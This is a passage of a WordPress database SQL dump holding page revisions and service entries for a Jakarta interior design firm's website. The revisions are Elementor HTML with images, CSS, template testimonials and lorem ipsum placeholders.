src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:48:56','2023-05-25 10:48:56','',22,'https://bauhaus.futuremediatrix.com/?p=4773',0,'revision','',0),(4774,3,'2023-05-25 10:50:32','2023-05-25 10:50:32','','Residential','Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.','publish','open','closed','','residential','','','2023-09-22 09:23:10','2023-09-22 09:23:10','',0,'https://bauhaus.futuremediatrix.com/?post_type=ova_sev&#038;p=4774',0,'ova_sev','',0),(4775,3,'2023-05-25 10:51:24','2023-05-25 10:51:24','','Commercial','Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.','publish','open','closed','','commercial','','','2023-09-22 09:24:03','2023-09-22 09:24:03','',0,'https://bauhaus.futuremediatrix.com/?post_type=ova_sev&#038;p=4775',0,'ova_sev','',0),(4776,3,'2023-05-25 10:52:25','2023-05-25 10:52:25','','Office','Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.','publish','open','closed','','office','','','2023-09-22 09:24:35','2023-09-22 09:24:35','',0,'https://bauhaus.futuremediatrix.com/?post_type=ova_sev&#038;p=4776',0,'ova_sev','',0),(4777,2,'2023-05-25 10:53:18','2023-05-25 10:53:18','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:53:18','2023-05-25 10:53:18','',22,'https://bauhaus.futuremediatrix.com/?p=4777',0,'revision','',0),(4778,2,'2023-05-25 10:53:18','2023-05-25 10:53:18','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				